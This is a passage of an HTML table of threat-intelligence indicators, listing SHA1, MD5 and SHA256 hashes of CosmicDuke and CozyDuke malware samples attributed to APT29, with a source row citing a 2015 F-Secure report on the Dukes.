<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8AA9F5D426428EC360229F4CB9F722388F0E535C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a874e5ecd67dffab45e17e9b730daed</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">51b4e69183f3d02124f3314cc64a7869425f053d8021c74c12f21d7c2afe2163</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8AB7F806FA18DD9A9C2DC43DB0AD3EE79060B6E8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d729fbb50665932fe529f7073acca9c1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9ce93f04dbb6a3b833f1146a54dadfdc224fdf24e3cca1f8a1eb4e902d597ff6</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8F4138E9588EF329B5CF5BC945DEE4AD9FEC1DFF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">50a56d98be79a1e6f04a1964e170a5d7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1005b40f977b92cbc01b7a66558ff0621cbaf36f7b4b2ab2ca3c3a267891bc8d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9090DE286CE9126E8E9C1C3A175A70AB4656CA09</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">baffad69d3ce95853a6db80711b74a38</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cb0d78c79ad46c04e7ab66ca95588db8ccde4d2710a171585b0276736aa4e059</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">91FD13A6B44E99F7235697AB5FE520D540279741</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d34c6d5875f5d2aab929d1f7ce968860</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0dc70c0f2ed18c813a89c59686f375787ba683b549b1e6bb9aee6ca33be64bfb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">926046F0C727358D1A6FBDD6FF3E28BC67D5E2F6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2bd46a980dde8eaa13e3defffb87e1e0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f6af08e31471c98adcc26f9916e26d41aa0c47ff94949d3174d55c320032be26</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9700C8A41A929449CFBA6567A648E9C5E4A14E70</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">608b22fcd2d067730176e335d3c6454b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4fc0bbb90aeecd3229aa932437273ba59f887a6eac569b56693602b957e205e2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">97C62E04B0CE401BD338224CDD58F5943F47C8DE</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">37c394e3e15d211a050446bc90edac94</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ec49400e70c02a884a5df74ca99690886ec2d528e200c42dbdf057fd9b7f87f8</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A2ED0EAAEADAA90D25F8B1DA23033593BB76598E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cf2041ddfdc177b863a23ab7ade78043</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4e9942bddfeb3369897c58d9b8fe2478c1df96e5b13733bfb24d975282685c29</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A421E0758F1007527FEC4D72FA2668DA340554C9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">75c97ca9b085411af1860523c3c884b5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">85d75a3eddc2f849e1dee40b47629ea0d1e3a1da6ba3cd9078177bb61a63f4fd</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A74ECEEA45207A6B46F461D436B73314B2065756</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">704381812f4cc3c5b3875ea33232c842</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a7b230593aa43c701c30862d3054b4510ed1dea1fd5f219b1c3bc11321bab73b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A7819C06746AE8D1E5D5111B1CA711DB0C8D923E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d47b25667effc0f88ab460c6edeecc55</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">30b24935c8537c51ce56a69510019d8481ac78e6c5ccdbe792c625c69c5358f9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A81B58B2171C6A728039DC493FAAF2CAB7D146A5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">35c6928790ce08309af997654ed6d719</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7d9296ac474b991780b41f654b557e01ba93ae932ba717146e60c1b9ed579539</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B2A951C5B2613ABDB9174678F43A579592B0ABC9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b2737204531a80c31bb30e9be9a1cc4c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7c2bb277e3a982e9e2f76da2c96119514dde4f3e36b16eca5994be5f28bd0029</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B54B3C67F1827DAB4CC2B3DE94FF0AF4E5DB3D4C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f611f8b0655a8980cf71a252536c7a5a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">16870c6b572934f5a106d5f632b6d41bb23924c12ddf172be24c6dfca25226b1</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B579845C223331FEA9DFD674517FA4633082970E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2337a4fa99547eb0cf7600601ab44dda</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">73aac0b568f83746c9a54a2a6fdd2984c3e6f8d0c77a681c219abb9480859197</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BBE24AA5E554002F8FD092FC5AF7747931307A15</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">26e8b95dfbc6a8aafe40ab84b1d2ab5e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">910a016a7b6e0a76bc7ddf12f9135090e0b23d00c382d70084b46bea4bbbcae7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C2B5AFF3435A7241637F288FEDEF722541C4DAD8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">345adb4594e3a2b02041c7e2b5fde46b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bf012045464ba2aadc1547940eb3ce262d0e023c2198c134dee658c859ecd8ab</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C637A9C3FB08879E0F54230BD8DCA81DEB6E1BCF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bc304fb92a79bab73b75772427d14ffa</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4203168c1bad752af7f39f8fa8eae4e8a5e41f39892abffa804d52a008e2dfd7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CBCA642ACDB9F6DF1B3EFEF0AF8E675E32BD71D1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9003e1d69cd29280d2233c1634370c60</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a38e41831d495ceb07dd232506447c62203ab05fe9e15e2b2a6a74aa9b0b0e96</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CCB29875222527AF4E58B9DD8994C3C7EF617FD8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0be02d5f66f84ebd03f362ad4b4a06e6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">04819cde7e928e6ff376daeb73b894959f672a85b363753c227416fc0f4a8acd</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CD7116FC6A5FA170690590E161C7589D502BD6A7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">37369a91ad462f1fac9004f3a86bb3ac</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4bc8280a99d07165055fabed11049d8da275f27f5d8cffc4ed10a68be2d0cb84</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D303A6DDD63CE993A8432F4DAAB5132732748843</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3adea70969f52d365c119b3d25619de9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c9f5a19c7b11fd866483adc93aa5bc4bd3515bd995ca79297b227e3e5ef1a665</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E60D36EFD6B307BEF4F18E31E7932A711106CD44</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">61c6d0076ee4187f9ec31841aa645d42</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2eafc64769c500d635b7225c9b1411db8f50db8618e4d5807e1640b641a2f5ee</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E841CA216CE4EE9E967FFFF9B059D31CCBF126BD</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f239e79e87f09000c247ff7e91ab9603</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6322e8bbb5a7cc542a7da0fb33a60fc7443bcbd8601b828c9c7f138c71cce090</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ECD2FEB0AFD5614D7575598C63D9B0146A67ECAA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">edf7a81dab0bf0520bfb8204a010b730</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bd4928921ddadb44f9f573da61dac034533bf14fe38acd5754f3ccec1d566300</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ED14DA9B9075BD3281967033C90886FD7D4F14E5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">acac7584d7dc066d27555997d0f6d6cf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9c2562e05eb940ae8d73c9baa7cfe85cb3ec619689227f65e4fbeeb3fec598ad</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ED328E83CDA3CDF75FF68372D69BCBACFE2C9C5E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f5cc1c0c90fb89e4b4fc048c5a03b46f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">43bcee4067c067d9063ddfc101fc8b5a6e8d42184ef8b0fdd9bb14102cb9973d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F621EC1B363E13DD60474FCFAB374B8570EDE4DE</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d824cbf08604dea9724ab8e707bb9fec</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">68355d29ce79a5177084fe6292f0f8b9daa2018c571b552fff9f4a0815b432ce</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">FBF290F6ADAD79AE9628EC6D5703E5FFB86CF8F1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5080bc705217c614b9cbf67a679979a8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f21794d0b0938643e2aabe9f2ed762528e631a2ebda76020d0b59ce91fb51e41</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CosmicDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">FECDBA1D903A51499A3953B4DF1D850FBD5438BD</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dffcd7f930f8874dc9f5115d0ae50b57</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3e889cd495e008760fd12751d6d45cadf8a7280c4545f2ebe469f84b9b77c835</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">01D3973E1BB46E2B75034736991C567862A11263</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5b4250a6bb4c6915ce962d489ee912d6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">637cabc343e3ed5b447dccb13aa7caf4d3a3eb3cd617d360167f270ec34596ea</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">04AEFBF1527536159D72D20DEA907CBD080793E3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a42acbdb285a7fba17f95068822ea4e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4464c945c88ac9a4a22e86f0922f18c164e87f26c3f3fa054eb488fdd7d4bfc8</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0E020C03FFFABC6D20ECA67F559C46B4939BB4F4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">83f57f0116a3b3d69ef7b1dbe9943801</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fdd7e8582ef8d7a23f269653435582cfe924ca9b2db34af63af5e57d1f3e09c2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1E5F6A5624A9E5472D547B8AA54C6D146813F91D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bd52b2a371ff397c90b891b7a4f04c66</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b9c996b06e0db273a4edede3fd6fda2b40b2e0201eba3e8ac581d802fc610a4a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">207BE5648C0A2E48BE98DC4DC1D5D16944189219</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">14d779777af6eb7c556ae338b462c48d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b9ea2cc39808780ade1fe51287072e958448be7e3a7b32bfd48438453592018c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">23E20C523B9970686D913360D438C88E6067C157</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f0a6436ffee12558a434a0fc24b3b33f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5f827730c7bd155997121f023ca9775077a37a58111738fcb3213757170bd860</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">25B6C73124F11F70474F2687AD1DE407343AC025</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6332176672744320e9fee2117b059193</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d469000ca9e6af92876334e3a460ea4ac8a61c1a6ee819eefbfd0c79ea4fb315</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">32B0C8C46F8BAABA0159967C5602F58DD73EBDE9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0e0182694c381f8b68afc5f3ff4c4653</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c1b19af1e354f13c90163780be6ad50f02d5bf8bac1c9cc1eab1377a159de1be</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">446DAABB7AC2B9F11DC1267FBD192628CC2BAC19</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">91aaf47843a34a9d8d1bb715a6d4acec</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dc70d3046b59785b2b9b7091e26f2484ba7a488dba420a8a05be388a337c399e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">482D1624F9450CA1C99926CEEC2606260E7CE544</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fd8e27f820bdbdf6cb80a46c67fd978a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f7f4d18dbc0b822b89ba14ffea24114f92b593be0f287f300bb269b310883039</span></td></tr>
